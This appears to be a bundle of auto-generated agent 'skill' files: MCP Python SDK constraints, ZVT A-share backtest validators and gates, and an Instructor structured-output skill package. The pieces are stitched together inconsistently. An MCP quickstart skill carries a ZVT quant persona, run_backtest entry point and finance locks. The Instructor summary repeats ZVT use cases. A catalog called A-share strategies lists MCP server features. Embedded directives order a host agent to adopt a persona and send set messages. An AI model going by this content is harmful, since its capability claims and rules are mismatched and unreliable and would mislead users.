    action: rely on the bundled `pywin32` Job Object termination at client/stdio.py:17-22 / :255-270 — Windows lacks process
      groups, so Job Objects are the canonical way to atomically terminate a process tree. Custom Windows termination logic
      via TerminateProcess() alone misses orphaned children
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Windows clients that do not use Job Object semantics leave orphaned child processes after MCP server termination
      — accumulates over many start/stop cycles, eventually saturates user session resources
    stage_ids:
    - transport_select
    derived_from_bd_id: BD-015
  - id: mcp-C-045
    when: When sending notifications or responses (no-reply-expected messages) over streamable-http
    action: expect HTTP `202 Accepted` as the success status for notifications and one-shot responses — the server returns
      202 at streamable_http.py:502 for any message that does not have an expected reply. Clients that retry on non-200 will
      retry-storm the server
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Clients with strict 200-only retry logic interpret 202 as failure, retry, get another 202, retry again —
      DDoS the server. 202 is correct per HTTP semantics for accepted-but-no-content responses
    stage_ids:
    - transport_select
    derived_from_bd_id: stage transport_select
  - id: mcp-C-046
    when: When constructing a JSON-RPC envelope manually (not via the bundled types module) for a custom MCP transport or
      proxy
    action: 'include `''jsonrpc'': ''2.0''` as a literal string field in every JSONRPCRequest / JSONRPCNotification / JSONRPCResponse
      / JSONRPCError envelope — types/jsonrpc.py:13-77 defines all four with `jsonrpc: Literal[''2.0'']` enforced by Pydantic
      at decode boundary; missing or wrong value fails validation'
    severity: high
    kind: domain_rule
    modality: must
    consequence: 'Envelope without `jsonrpc: ''2.0''` fails Pydantic validation immediately on receive; custom transports
      that strip the field for compactness break the entire wire protocol'
    derived_from_bd_id: global_contracts[0]
  - id: mcp-C-047
    when: When the OTel-traced MCP server spawns handler tasks that need to inherit trace context (OpenTelemetry spans, request
      IDs)
    action: let `Server.run` perform `contextvars.copy_context()` per spawn — at lowlevel/server.py:400 every inbound JSON-RPC
      request gets `context = contextvars.copy_context()` and is run via `context.run(tg.start_soon, self._handle_message,
      ...)` to preserve OTel trace state. Custom dispatch outside this pattern loses trace context across the task boundary
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Trace context (OpenTelemetry spans, request IDs) does not propagate to handler task — distributed traces
      appear disconnected, request correlation in logs breaks. Especially painful when debugging multi-tool flows
    derived_from_bd_id: BD-014 / global_contracts[4]
  - id: mcp-C-048
    when: When upgrading the mcp-python-sdk dependency in a production server
    action: assume MCP spec semantics or framework APIs are stable across versions — the spec is Anthropic-driven (BD-022
      DK note) and embeds Claude.ai product expectations (OAuth elicitation flow, payment confirmation). The SDK has experimental
      subsystems (16 of 18 abstract methods) and an actively-evolving rename divergence (FastMCP→MCPServer at this commit).
      Pin the version and audit changelogs before upgrading
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Silent upgrades have hit major-rename divergences (FastMCP→MCPServer), deprecated APIs being removed (elicit),
      and protocol-version additions (4 versions in 18 months). Production servers without pinning regularly break on upgrade
    derived_from_bd_id: BD-022
  - id: mcp-C-049
    when: When implementing a Prompt with a synchronous (non-async) function body
    action: let the framework wrap the sync function via `anyio.to_thread.run_sync` at prompts/base.py:164 — the framework
      auto-detects sync vs async and bridges. Do not manually wrap with `asyncio.to_thread` or block the event loop with sync
      I/O inside a notional `async def` Prompt
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Sync I/O blocking the event loop in a Prompt handler stalls all other concurrent tool calls on the same server
      instance. anyio.to_thread.run_sync correctly hands off to thread pool
    stage_ids:
    - three_primitives
    derived_from_bd_id: stage three_primitives
  - id: mcp-C-050
    when: When defining a Tool's return type for auto-generated output_schema (Pydantic / TypedDict / dataclass / primitive)
    action: 'annotate the function return type explicitly — `output_schema` at tools/base.py:39 is auto-derived from the return
      annotation. Primitives (int, str, bool) are wrapped as `{''result'': value}`. Untyped returns lose JSON-Schema generation
      and the client-side validation surface'
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Tool without return-type annotation cannot have an output_schema; clients depending on output validation
      get nothing. Sub-tools that compose with other tools via tool_use cannot reason about expected shape
    stage_ids:
    - three_primitives
    derived_from_bd_id: stage three_primitives
output_validator:
  assertions:
  - id: OV-01
    check_predicate: all(p in inspect.getsource(zvt.factors.algorithm.macd) for p in ['slow=26', 'fast=12', 'n=9'])
    failure_message: 'FATAL: MACD params drifted from (fast=12, slow=26, n=9) — SL-08 violation, non-reproducible signals'
    business_meaning: Standard MACD parameters are a semantic lock; drift makes results incomparable with industry-standard
      indicators and non-reproducible.
    source_ids:
    - SL-08
    - BD-036
  - id: OV-02
    check_predicate: result.get('total_trades', 0) > 0 or result.get('explicit_zero_trade_ack') is True
    failure_message: Zero trades executed — likely missing pre-fetched data (see PC-02) or over-restrictive filters
    business_meaning: A backtest with zero trades is not a valid result; either data is missing or the strategy never triggered.
      Structural non-emptiness check is insufficient — we need business confirmation.
    source_ids:
    - SL-01
    - finance-C-073
  - id: OV-03
    check_predicate: result.get('annual_return') is None or abs(float(result['annual_return'])) <= 5.0
    failure_message: 'FATAL: |annual_return| > 500% — likely look-ahead bias or data error'
    business_meaning: Annual returns exceeding 500% are physically implausible for A-share strategies; indicates look-ahead
      bias or corrupt data.
    source_ids: []
  - id: OV-04
    check_predicate: result.get('holding_change_pct') is None or abs(float(result['holding_change_pct'])) <= 1.0
    failure_message: 'FATAL: |holding_change_pct| > 100% — physically impossible'
    business_meaning: Holding change percentage cannot exceed 100%; violation indicates position accounting error.
    source_ids:
    - BD-029
  - id: OV-05
    check_predicate: result.get('max_drawdown') is None or abs(float(result['max_drawdown'])) <= 1.0
    failure_message: 'FATAL: |max_drawdown| > 100% — impossible for non-leveraged account'
    business_meaning: Maximum drawdown cannot exceed 100% without leverage; violation indicates calculation error or look-ahead
      bias.
    source_ids: []
  - id: OV-06
    check_predicate: not (hasattr(result, 'trade_log') and result.trade_log and any(result.trade_log[i].action == 'sell' and
      i+1 < len(result.trade_log) and result.trade_log[i+1].action == 'buy' and result.trade_log[i].timestamp == result.trade_log[i+1].timestamp
      for i in range(len(result.trade_log)-1)))
    failure_message: 'FATAL: buy-before-sell detected in same cycle — SL-01 violation, creates implicit leverage'
    business_meaning: SL-01 requires sell() before buy() in each cycle; violation means available_long was not updated before
      buying, risking duplicate positions.
    source_ids:
    - SL-01
  scaffold:
    validate_py_path: '{workspace}/validate.py'
    tail_block: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()\n    from\
      \ validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\")\n# ===\
      \ END DO NOT MODIFY ==="
  enforcement_protocol: 1. Never edit validate.py. 2. Never delete the DO NOT MODIFY tail block from the main script. 3. Never
    wrap enforce_validation() in try/except. 4. Never rewrite result write logic — it MUST go through enforce_validation.
    5. If validate.py raises ImportError, fix the dependency, do not remove the call.
acceptance:
  hard_gates:
  - id: G1
    check: '{workspace}/result.csv exists AND file size > 0'
    on_fail: Strategy did not produce output; check run_backtest() return value and enforce_validation() call
  - id: G2
    check: '{workspace}/result.csv.validation_passed marker file exists'
    on_fail: Validation did not complete; review validate.py output and fix assertion failures
  - id: G3
    check: 'Main script contains literal: from validate import enforce_validation'
    on_fail: Validation chain stripped; re-add the import in the DO NOT MODIFY block
  - id: G4
    check: 'Main script contains literal: # === DO NOT MODIFY BELOW THIS LINE ==='
    on_fail: Validation fence removed; regenerate DO NOT MODIFY tail block
  - id: G5
    check: 'result.csv has at least 1 row: pandas.read_csv(result.csv).shape[0] >= 1'
    on_fail: Empty result; check if trade_log is non-empty and factors generated signals. Confirm PC-02 (k-data exists) passed.
  - id: G6
    check: 'If MACD strategy: source contains ''slow=26'' AND ''fast=12'' AND ''n=9'' in algorithm call'
    on_fail: MACD params drifted from SL-08 lock; restore standard (12, 26, 9)
  - id: G7
    check: 'For data pipeline tasks: result.csv contains ''entity_id'' and ''timestamp'' fields'
    on_fail: Missing required columns; check Mixin.query_data return schema and DataFrame MultiIndex reset_index() before
      writing
  - id: G8
    check: 'OV-03 passes: abs(annual_return) <= 5.0 (500%)'
    on_fail: Physical plausibility check failed; investigate look-ahead bias or data corruption in input kdata
  soft_gates:
  - id: SG-01
    rubric: 'Strategy narrative consistency: user intent aligns with generated strategy.py logic. dim_a: signal direction
      (buy/sell) matches intent [1-5, pass>=4]; dim_b: frequency (daily/intraday) aligns [1-5, pass>=4]; dim_c: risk controls
      match user intent [1-5, pass>=4].'
  - id: SG-02
    rubric: 'Factor combination quality. dim_a: no highly correlated factor duplication [1-5, pass>=4]; dim_b: multi-period
      alignment correct [1-5, pass>=4]; dim_c: liquidity filter present for A-share [1-5, pass>=4].'
  - id: SG-03
    rubric: 'Data source selection appropriateness. dim_a: coverage sufficient for target entities [1-5, pass>=4]; dim_b:
      provider latency acceptable for strategy frequency [1-5, pass>=4]; dim_c: no unauthorized provider used without credentials
      [1-5, pass>=4].'
skill_crystallization:
  trigger: all_hard_gates_passed AND user_opt_out_skill_saving != true
  output_path_template: '{workspace}/../skills/{slug}.skill'
  slug_template: '{blueprint_id_short}-{uc_id_lower}'
  captured_fields:
  - name
  - intent_keywords
  - entry_point_script
  - validate_script
  - fatal_constraints
  - spec_locks
  - preconditions
  - install_recipes
  - human_summary_translated
  action: 'After all Hard Gates PASS, resolve slug via slug_template using the executed UC, then write the .skill YAML file
    at output_path_template. Notify user in their detected locale: ''Skill saved as {slug}.skill — next time say one of {sample_triggers}
    from the matched UC to invoke directly.'''
  violation_signal: All hard gates passed but no .skill file exists at expected path
  skill_file_schema:
    name: finance-bp-140 / Decorator-style stdio server (Quickstart)
    version: v6.1
    intent_keywords:
    - quickstart
    - stdio server
    - decorator API
    - hello world
    entry_point: run_backtest
    fatal_guards:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-10
    - SL-11
    - SL-12
    spec_locks:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-09
    - SL-10
    - SL-11
    - SL-12
    preconditions:
    - PC-01
    - PC-02
    - PC-03
    - PC-04
post_install_notice:
  trigger: skill_installation_complete
  message_template:
    positioning: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow.
    capability_catalog:
      group_strategy:
        source: auto_grouped
        strategy_reason: auto-grouped by UC.type (2 distinct values, balanced distribution)
      groups:
      - group_id: complete_strategy
        name: Complete Strategy
        description: ''
        emoji: 📦
        uc_count: 7
        ucs:
        - uc_id: UC-001
          name: Decorator-style stdio server (Quickstart)
          short_description: Minimal Tool + Resource + Prompt server over stdio — the canonical "hello world" for MCP
          sample_triggers:
          - quickstart
          - stdio server
          - decorator API
        - uc_id: UC-003
          name: LLM-sampling tool (server invokes client LLM)
          short_description: Tool needs LLM completion → calls back to client via ctx.session.create_message
          sample_triggers:
          - sampling
          - server-to-client LLM call
          - thinking tools
        - uc_id: UC-004
          name: Form + URL elicitation
          short_description: Booking confirmation (form mode), payment / OAuth confirmation (URL mode), and the throw-pattern
            via UrlElicitationRequiredError to abort with -32042
          sample_triggers:
          - elicitation
          - form input
          - URL flow
        - uc_id: UC-005
          name: Long-running tool with progress
          short_description: Stream ctx.report_progress + ctx.info / ctx.debug during multi-step task to keep client informed
            of long operations
          sample_triggers:
          - long-running tool
          - progress reporting
          - ctx.report_progress
        - uc_id: UC-006
          name: OAuth-protected server
          short_description: Server requires bearer token via AuthSettings + TokenVerifier
          sample_triggers:
          - OAuth2
          - bearer token
          - authentication
        - uc_id: UC-007
          name: Stateless streamable-HTTP for K8s scaling
          short_description: High-throughput, no per-session state — the recommended production config (stateless + json_response)
          sample_triggers:
          - stateless HTTP
          - production config
          - K8s scaling
        - uc_id: UC-008
          name: Mount multiple MCP servers in one Starlette app
          short_description: Microservice gateway pattern — /echo + /math mounted under one ASGI host
          sample_triggers:
          - mount multiple servers
          - Starlette mount
          - microservice gateway
      - group_id: extension_example
        name: Extension Example
        description: ''
        emoji: 📦
        uc_count: 5
        ucs:
        - uc_id: UC-002
          name: Lifespan-managed DB tool
          short_description: Connection pool / DB / external service initialised once at startup and injected into every tool
            via typed Context
          sample_triggers:
          - lifespan
          - dependency injection
          - DB connection pool
        - uc_id: UC-009
          name: Resumable connection via custom EventStore
          short_description: Long-lived clients reconnect with Last-Event-ID — events stored externally (Redis, DB) so the
            server can replay from a known point
          sample_triggers:
          - resumable HTTP
          - EventStore
          - Last-Event-ID
        - uc_id: UC-010
          name: Pagination cursor over large lists
          short_description: Tool / resource lists too big for one response — cursor-based paging with explicit page tokens
          sample_triggers:
          - pagination
          - cursor
          - large list response
        - uc_id: UC-011
          name: Experimental task subsystem (long-running async tools)
          short_description: Tools that take longer than a request lifetime — task creation, status polling, result fetch
          sample_triggers:
          - long-running tasks
          - async task subsystem
          - TaskStore
        - uc_id: UC-012
          name: Structured output schema
          short_description: 'Pydantic / TypedDict / dataclass return types auto-validated as JSON Schema; primitives wrapped
            in {"result": value}'
          sample_triggers:
          - structured output
          - Pydantic return type
          - TypedDict
    call_to_action: Tell me which one you want to try.
    featured_entries:
    - uc_id: UC-001
      beginner_prompt: Try decorator-style stdio server (quickstart)
      auto_selected: true
    - uc_id: UC-002
      beginner_prompt: Try lifespan-managed db tool
      auto_selected: true
    - uc_id: UC-003
      beginner_prompt: Try llm-sampling tool (server invokes client llm)
      auto_selected: true
    more_info_hint: Ask me 'what else can you do?' to see all 12 capabilities.
  locale_rendering:
    instruction: On skill_installation_complete, translate ALL user-facing strings (positioning + capability_catalog.groups[].name
      + capability_catalog.groups[].description + capability_catalog.groups[].ucs[].short_description + call_to_action + featured_entries[].beginner_prompt
      + more_info_hint) into detected user locale per locale_contract. Preserve UC-IDs, group_id, emoji, and sample_triggers
      verbatim.
    preserve_verbatim:
    - UC-IDs
    - group_id
    - emoji
    - sample_triggers
    - technical_class_names
  enforcement:
    action: 'Host agent MUST send composed message to user as the FIRST user-facing response after skill_installation_complete
      event. Message MUST contain: positioning, capability_catalog (rendered as markdown tables per group), 3 featured_entries,
      call_to_action, and more_info_hint.'
    violation_code: PIN-01
    violation_signal: First user-facing message post-install does not contain the full capability_catalog (all UCs grouped)
      OR skips featured_entries OR skips call_to_action.
human_summary:
  persona: Doraemon
  what_i_can_do:
    tagline: 'I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me
      what you want; I''ll write the code, you don''t have to dig docs. (Heads up: ZVT natively supports A-share, HK, and
      crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don''t bother for serious work.)'
    use_cases:
    - LLM-sampling tool (server invokes client LLM)
    - Lifespan-managed DB tool
    - Decorator-style stdio server (Quickstart)
    - A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
    - 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader'
    - Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
    - Index composition data collection (SZ1000, SZ2000) with EM recorder
  what_i_auto_fetch:
  - ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
  - Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
  - Fatal constraints (finance-C-*) relevant to your target strategy type
  - 'Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY'
  - Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
  - Provider-specific recorder class names and required class attributes
  what_i_ask_you:
  - 'Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage
    is thin)'
  - 'Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare,
    or qmt (broker)?'
  - 'Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?'
  - 'Time range: start_timestamp and end_timestamp for backtest period'
  - 'Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?'
  locale_rendering:
    instruction: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona
      (direct, frank, mildly snarky, knows limits).
    preserve_verbatim:
    - BD-IDs
    - SL-IDs
    - UC-IDs
    - finance-C-IDs
    - class_names
    - function_names
    - file_paths
    - numeric_thresholds

ClawHub Coding Documentation+2

T@clawhub-tangweigang-jpg-8679fec286

Instructor Structured Output

Skill

Instructor：声明 Pydantic BaseModel 即可从 20 个 LLM provider 拿到类型化实例。核心是 monkey-patch（instructor.patch / from_*）拦截 create()，注入 schema-aware kwargs，tenacity 重试 + In...

---
name: instructor-structured-output
description: |-
  Instructor：声明 Pydantic BaseModel 即可从 20 个 LLM provider 拿到类型化实例。核心是 monkey-patch（instructor.patch / from_*）拦截 create()，注入 schema-aware kwargs，tenacity 重试 +
  Instructor: declare a Pydantic BaseModel and receive a typed instance back from any of 20 LLM providers. Core mechanism is a monkey-patch (instructor.patch / from_*) that intercepts create(), injects schema-aware kwargs, runs the call inside a tenacity retry loop, and rewrites fa
license: MIT-0
compatibility: AI engineering knowledge skill — host AI consumes seed.yaml directly. No installation required.
metadata:
  version: "v0.1.0"
  blueprint_id: "finance-bp-139"
  blueprint_source: "jxnl/instructor"
  blueprint_commit: "3f1d6ddb084b8a0da3eb0665051293d381383b41"
  category: ai-engineering
  doramagic_url: "https://doramagic.ai/zh/crystal/instructor-structured-output"
  openclaw:
    skillKey: instructor-structured-output
    category: ai-engineering
    primaryEnv: knowledge
---
# 这个 skill 适合什么用户？能做哪些任务？

## 概览

Instructor 是把 Pydantic BaseModel 直接绑到 LLM 输出的 Python 框架（github.com/jxnl/instructor）。核心机制：monkey-patch（instructor.patch / instructor.from_*）拦截 provider client 的 create() 调用，注入 schema-aware kwargs，在 tenacity 重试循环里跑，验证 JSON 响应到模型，ValidationError 时把 failed_attempts 作为 XML 重写 prompt 再试。

支持 20 个 provider...

**Doramagic 晶体页**: https://doramagic.ai/zh/crystal/instructor-structured-output

## 知识规模

- **47 条约束** (4 fatal + 43 non-fatal)
- 上游源码: `jxnl/instructor` @ commit `3f1d6ddb`
- 蓝图 ID: `finance-bp-139`

## 用法

Host AI（Claude Code / Cursor / OpenClaw）读 `references/seed.yaml`，按其中的：
- `intent_router` 匹配用户意图
- `architecture` 理解项目架构
- `constraints` 应用 anti-pattern 约束
- `business_decisions` 参考核心设计决策

## FAQ 摘要

### 这个 skill 适合什么用户？能做哪些任务？
适合需要从 LLM 拿到强类型结构化输出的工程师：信息抽取、表单解析、JSON API 直接返回 Pydantic 模型、agent 工具调用参数解析等。20 个 provider 一致 API。访问 doramagic.ai/r/instructor 查看完整用例。

### 需要准备什么环境？依赖什么？
Python 3.9+（instructor 在 pyproject 中声明 >=3.9）。Pydantic v2 事实上必须（function_calls.py 用 model_validate_json + TypeAdapter，都是 v2-only，v1 在 Partial 路径上 AttributeError）。

### 会踩哪些坑？这个 skill 怎么防护？
本 skill 内置 47 条约束（4 条 fatal）。典型踩坑：(1) failed_attempts XML 每次重试线性增长，max_retries=5 可超 context window；(2) from_openai 的 mode 验证用 assert，python -O 下静默剥离；

---

完整文档: 见 `references/seed.yaml` (v6.1 schema). 浏览页: https://doramagic.ai/zh/crystal/instructor-structured-output

FILE:human_summary.md
# finance-bp-139-v6.1 — Human Summary

**Persona**: Doraemon

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- Knowledge Graph Extraction (nodes + edges)
- SOC Occupation Code Classification with field_validator
- PII Extraction and Scrub Replacement
- A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
- End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader
- Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
- Index composition data collection (SZ1000, SZ2000) with EM recorder

## What I Auto-Fetch

- ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
- Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
- Fatal constraints (finance-C-*) relevant to your target strategy type
- Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY
- Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
- Provider-specific recorder class names and required class attributes

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Locale Rendering

**Instruction**: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona (direct, frank, mildly snarky, knows limits).

**Preserve verbatim**: BD-IDs, SL-IDs, UC-IDs, finance-C-IDs, class_names, function_names, file_paths, numeric_thresholds

---

*Generated by compile_crystal_skeleton.py v5.0 for finance-bp-139-v6.1*
*All content is English source — agent translates on first user contact.*
FILE:references/seed.yaml
meta:
  id: finance-bp-139-v6.1
  version: v6.1
  blueprint_id: finance-bp-139
  sop_version: crystal-compilation-v6.1
  source_language: en
  compiled_at: '2026-04-25T09:07:15.548776+00:00'
  target_host: openclaw
  authoritative_artifact:
    primary: seed.yaml
    non_authoritative_derivatives:
    - SKILL.md (host-generated summary, may lag)
    - HEARTBEAT.md (host telemetry)
    - memory/*.md (host conversational memory)
    rule: On any behavioral decision (preconditions check, OV assertion, EQ rule firing, spec_lock verification), agents MUST
      re-read seed.yaml. Derivatives are for UI display only and may be out-of-date.
  execution_protocol:
    install_trigger:
    - Execute resources.host_adapter.install_recipes[] in declared order
    - Verify each package with import check before proceeding
    execute_trigger: When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)
    on_execute:
    - Reload seed.yaml (do not rely on SKILL.md or cached summaries)
    - Run preconditions[] in declared order; halt on first fatal failure with on_fail message to user
    - Enter context_state_machine.CA1_MEMORY_CHECKED state
    - Evaluate evidence_quality.enforcement_rules[]; prepend user_disclosure_template
    - Translate user_facing_fields to user locale per locale_contract
    workspace_resolution:
      scripts_path: '{host_workspace}/scripts/'
      skills_path: '{host_workspace}/skills/'
      trace_path: '{host_workspace}/.trace/'
locale_contract:
  source_language: en
  user_facing_fields:
  - human_summary.what_i_can_do.tagline
  - human_summary.what_i_can_do.use_cases[]
  - human_summary.what_i_auto_fetch[]
  - human_summary.what_i_ask_you[]
  - evidence_quality.user_disclosure_template
  - post_install_notice.message_template.positioning
  - post_install_notice.message_template.capability_catalog.groups[].name
  - post_install_notice.message_template.capability_catalog.groups[].description
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].name
  - post_install_notice.message_template.capability_catalog.groups[].ucs[].short_description
  - post_install_notice.message_template.call_to_action
  - post_install_notice.message_template.featured_entries[].beginner_prompt
  - post_install_notice.message_template.more_info_hint
  - preconditions[].description
  - preconditions[].on_fail
  - intent_router.uc_entries[].name
  - intent_router.uc_entries[].ambiguity_question
  - architecture.pipeline
  - architecture.stages[].narrative.does_what
  - architecture.stages[].narrative.key_decisions
  - architecture.stages[].narrative.common_pitfalls
  - constraints.fatal[].consequence
  - constraints.regular[].consequence
  - output_validator.assertions[].failure_message
  - acceptance.hard_gates[].on_fail
  - skill_crystallization.action
  locale_detection_order:
  - explicit_user_declaration
  - first_message_language
  - system_locale
  translation_enforcement:
    trigger: on_first_user_message
    action: Render user_facing_fields in detected locale, preserving all IDs (BD-/SL-/UC-/finance-C-) and code identifiers
      verbatim
    violation_code: LOCALE-01
    violation_signal: User receives untranslated English Human Summary when detected locale != en
evidence_quality:
  declared:
    evidence_coverage_ratio: null
    evidence_verify_ratio: null
    evidence_invalid: 0
    evidence_verified: null
    evidence_auto_fixed: null
    audit_coverage: 20 finance-universal not_applicable + 6 AIL warn + 4 DAT warn + 1 DAT pass + 1 DAT not_applicable = 32
      items reviewed across applicable scope
    audit_pass_rate: 1/12 (8% applicable items pass; the 11 warn/fail/missing capture the architectural boundaries and divergences
      worth surfacing as constraints)
    audit_fail_total: 0
    audit_finance_universal:
      pass: 0
      warn: 0
      fail: 0
    audit_subdomain_totals:
      pass: 0
      warn: 0
      fail: 0
  enforcement_rules:
  - id: EQ-01
    trigger: declared.evidence_verify_ratio < 0.5
    action: MUST invoke traceback lookup for all cited BD-IDs in output before emitting business code — read LATEST.yaml sections
      for each BD referenced
    violation_code: EQ-01-V
    violation_signal: Generated script references BD-IDs but no tool_call to read LATEST.yaml preceded code generation
  - id: EQ-02
    trigger: always
    action: MUST prepend user_disclosure_template (translated to user locale) to first user-facing response
    violation_code: EQ-02-V
    violation_signal: First agent response to user does not contain audit warning phrase
  user_disclosure_template: '[QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-139. Evidence verify ratio
    = 0.0% and audit fail total = 0. Generated results may have uncaptured requirement gaps. Verify critical decisions against
    source files (LATEST.yaml / LATEST.jsonl).'
traceback:
  source_files:
    blueprint: LATEST.yaml
    constraints: LATEST.jsonl
  mandatory_lookup_scenarios:
  - id: TB-01
    condition: Two constraints have apparently conflicting enforcement rules
    lookup_target: LATEST.jsonl — find both constraint IDs, compare `consequence` + `evidence_refs` to determine priority
  - id: TB-02
    condition: A business decision rationale is unclear or disputed
    lookup_target: LATEST.yaml — locate BD-ID under business_decisions, read `rationale` + `alternative_considered` fields
  - id: TB-03
    condition: evidence_invalid > 0 in evidence_quality.declared
    lookup_target: LATEST.yaml _enrich_meta — cross-check specific BD `evidence_refs` fields for invalid markers
  - id: TB-04
    condition: User asks where a rule comes from
    lookup_target: LATEST.jsonl — find constraint by ID, read `confidence.evidence_refs` for source file + line number
  - id: TB-05
    condition: Generated code does not match expected ZVT API behavior
    lookup_target: LATEST.yaml stages[].required_methods — verify method signature and evidence locator in source code
  degraded_lookup:
    no_fs_access: 'Ask the user to paste the relevant LATEST.yaml section or LATEST.jsonl lines for the BD-/finance-C- IDs
      in question. Crystal ID: finance-bp-139-v5.0.'
trace_schema:
  event_types:
  - precondition_check
  - spec_lock_check
  - evidence_rule_fired
  - evidence_rule_skipped
  - locale_translation_emitted
  - hard_gate_passed
  - hard_gate_failed
  - skill_emitted
  - false_completion_claim
preconditions:
- id: PC-01
  description: zvt package installed and importable
  check_command: python3 -c 'import zvt; print(zvt.__version__)'
  on_fail: 'Run: python3 -m pip install zvt  then re-run: python3 -m zvt.init_dirs to initialize data directories'
  severity: fatal
- id: PC-02
  description: K-data exists for target entities (required before backtesting)
  check_command: python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1);
    assert df is not None and len(df) > 0, 'No kdata found'"
  on_fail: 'Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000  (replace
    with your target entity IDs)'
  severity: fatal
  applies_to_uc: []
- id: PC-03
  description: ZVT data directory initialized (~/.zvt or ZVT_HOME)
  check_command: 'python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get(''ZVT_HOME'', Path.home()
    / ''.zvt'')); assert zvt_home.exists(), f''ZVT home not found: {zvt_home}''"'
  on_fail: 'Run: python3 -m zvt.init_dirs'
  severity: fatal
- id: PC-04
  description: SQLite write permission for ZVT data directory
  check_command: python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home()
    / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"
  on_fail: 'Check directory permissions: chmod u+w ~/.zvt  or set ZVT_HOME environment variable to a writable location'
  severity: warn
intent_router:
  uc_entries:
  - uc_id: UC-001
    name: PII Extraction and Scrub Replacement
    positive_terms:
    - PII
    - scrub
    - redact
    - sensitive data
    - compliance extraction
    data_domain: domain_specific
    negative_terms:
    - SQL
    - knowledge graph
    ambiguity_question: PII = field-level extraction from text; for SQL safety use UC-008, for knowledge graph use UC-003.
  - uc_id: UC-002
    name: SOC Occupation Code Classification with field_validator
    positive_terms:
    - classification
    - SOC code
    - field_validator
    - enum validation
    - reask example
    data_domain: domain_specific
    negative_terms:
    - free text classification
    - sentiment
  - uc_id: UC-003
    name: Knowledge Graph Extraction (nodes + edges)
    positive_terms:
    - knowledge graph
    - KG
    - entity relations
    - research synthesis
    data_domain: mixed
    negative_terms:
    - SQL extraction
    - flat field extraction
  - uc_id: UC-004
    name: Citation Substring Extraction with Fuzzy Match Verification
    positive_terms:
    - citation
    - fact-checking
    - RAG verification
    - substring quote
    data_domain: mixed
    negative_terms:
    - workloads where source text is unavailable (cannot verify substring)
  - uc_id: UC-005
    name: Parallel Multi-tool Routing
    positive_terms:
    - parallel tools
    - Iterable
    - Union types
    - agent dispatcher
    - Mode.PARALLEL_TOOLS
    data_domain: mixed
    negative_terms:
    - DAG
    - dependency
    - sequential
    ambiguity_question: parallel = independent tool calls in one shot; for dependent task chain use UC-009 (query planner
      DAG) instead.
  - uc_id: UC-006
    name: Partial Streaming for UI Real-time Render
    positive_terms:
    - partial streaming
    - UI typewriter
    - rich console
    - progressive render
    data_domain: mixed
    negative_terms:
    - validator-strict
    - business-rule-gated
  - uc_id: UC-007
    name: AI-driven SQLModel ORM Entity Generation
    positive_terms:
    - SQLModel
    - ORM generation
    - ResponseSchema
    - entity bootstrapping
    data_domain: domain_specific
    negative_terms:
    - SQL query generation
    - SQL safety
  - uc_id: UC-008
    name: Safe SQL Generation with Guardrail
    positive_terms:
    - SQL generation
    - safer SQL
    - injection prevention
    - validator guardrail
    data_domain: domain_specific
    negative_terms:
    - workloads needing certified SQL safety (instructor's validator is user-defined, not externally audited)
  - uc_id: UC-009
    name: Query Planner DAG Decomposition
    positive_terms:
    - query planning
    - DAG
    - task decomposition
